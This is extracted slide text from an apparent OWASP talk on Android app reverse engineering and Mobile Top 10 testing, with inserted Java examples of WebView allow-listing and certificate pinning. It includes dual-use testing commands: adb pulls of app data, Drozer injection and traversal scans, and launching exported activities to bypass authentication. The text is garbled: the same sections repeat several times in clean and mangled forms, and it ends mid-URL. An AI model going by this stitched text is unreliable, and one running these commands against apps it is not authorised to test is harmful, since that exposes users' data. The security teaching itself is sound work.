bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
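Added example (not code from the slides) of the mitigations above in an Android Activity: a WebView that only loads allow-listed https URLs received through an Intent, beside the vulnerable "load whatever arrived" pattern, and an explicit Intent for internal navigation. HelpActivity, SettingsActivity, the "url" extra and help.example.com are assumed names.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;

/**
 * Added example (not from the slides). Assumes an app with a WebView-backed
 * HelpActivity and a hypothetical internal SettingsActivity.
 */
public class HelpActivity extends Activity {

    private static final String EXTRA_URL = "url";                 // assumed extra name
    private static final String ALLOWED_HOST = "help.example.com"; // placeholder host

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView web = new WebView(this);
        setContentView(web);
        // JavaScript stays off unless the content really needs it: javascript: URLs and
        // injected HTML are the WebView injection vector named on the "what to inject" slide.
        web.getSettings().setJavaScriptEnabled(false);

        // VULNERABLE pattern: whatever arrives in the Intent is loaded, so any app (or crafted
        // link) that can reach this Activity chooses the content.
        //   web.loadUrl(getIntent().getStringExtra(EXTRA_URL));

        String target = safeTarget(getIntent());
        if (target == null) {
            finish(); // refuse rather than fall back to attacker-chosen content
            return;
        }
        web.loadUrl(target);
    }

    /** Accepts only https URLs on the allow-listed host; null means "reject". */
    static String safeTarget(Intent in) {
        String raw = in == null ? null : in.getStringExtra(EXTRA_URL);
        if (raw == null) return null;
        Uri u = Uri.parse(raw);
        if (!"https".equals(u.getScheme())) return null;    // blocks javascript:, file:, content:
        if (!ALLOWED_HOST.equals(u.getHost())) return null; // blocks third-party sites
        if (u.getUserInfo() != null) return null;           // blocks https://help.example.com@evil/
        return u.toString();
    }

    /** Internal navigation with an explicit Intent: no other app can register a filter for it. */
    void openSettings() {
        Intent i = new Intent(this, SettingsActivity.class); // target class, not an action string
        i.putExtra("from", "help");
        startActivity(i);
    }
}
```

In the manifest, internal activities additionally carry android:exported="false" and no intent-filter, so the implicit-intent chooser described on the slide never comes into play for them.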
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez – OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
JAR / DEX → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows the use of any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed-source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open-source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain-text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher / protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code

if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
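The pseudocode above worked out in plain JDK Java, as an added example that is not code from the slides: the platform trust manager still validates the chain first, then the SHA-256 of some certificate's SubjectPublicKeyInfo in that chain must match a pin. The pin strings are placeholders, not real keys, and hostname verification remains a separate check (HostnameVerifier) that this class does not replace.

```java
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

/**
 * Added example (not from the slides): "if (presented_cert == pinned_cert)" done properly.
 * Pins are "sha256/BASE64" digests of the SubjectPublicKeyInfo (the OkHttp / HPKP format),
 * so a certificate renewal with the same key does not break the app, and a backup pin
 * covers planned key rotation.
 */
public final class PinningTrustManager implements X509TrustManager {

    private final X509TrustManager platformTm; // chain building, signatures, expiry
    private final Set<String> pins;

    PinningTrustManager(X509TrustManager platformTm, Set<String> pins) {
        this.platformTm = platformTm;
        this.pins = pins;
    }

    static PinningTrustManager withPlatformTrust(Set<String> pins) throws Exception {
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null); // null = the platform CA store
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) return new PinningTrustManager((X509TrustManager) tm, pins);
        }
        throw new IllegalStateException("no X509TrustManager available");
    }

    /** SHA-256 over the DER-encoded SubjectPublicKeyInfo, Base64, prefixed "sha256/". */
    static String spkiPin(X509Certificate cert) throws CertificateException {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(cert.getPublicKey().getEncoded());
            return "sha256/" + Base64.getEncoder().encodeToString(digest);
        } catch (NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        // Step 1: normal PKI validation. The "21 apps trust all certificates" result on the next
        // slide is what an X509TrustManager with empty method bodies produces.
        platformTm.checkServerTrusted(chain, authType);
        // Step 2: at least one certificate in the validated chain must carry a pinned key.
        for (X509Certificate cert : chain) {
            if (pins.contains(spkiPin(cert))) return; // Start_connection()
        }
        throw new CertificateException("no certificate in the chain matches a pin"); // Drop_connection()
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        platformTm.checkClientTrusted(chain, authType);
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return platformTm.getAcceptedIssuers();
    }

    /** Wires the pinning manager into an SSLContext usable by HttpsURLConnection or OkHttp. */
    static SSLContext pinnedContext(Set<String> pins) throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { withPlatformTrust(pins) }, null);
        return ctx;
    }

    public static void main(String[] args) throws Exception {
        // PLACEHOLDER pins. Real values come from the server's current and backup keys, e.g.:
        //   openssl x509 -in server.pem -pubkey -noout | openssl pkey -pubin -outform der \
        //     | openssl dgst -sha256 -binary | openssl enc -base64
        Set<String> pins = new HashSet<>(Arrays.asList(
                "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",   // current key (placeholder)
                "sha256/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB="));  // backup key (placeholder)
        HttpsURLConnection.setDefaultSSLSocketFactory(pinnedContext(pins).getSocketFactory());
        // From here on, a chain that validates against the CA store but carries none of the
        // pinned keys (e.g. an interception proxy's CA) fails with CertificateException.
    }
}
```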
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark / Burp (to check if all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS / frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about a developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS / framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/Paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, via ADB:
adb logcat [output filter]
• Use a listener (Burp / Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
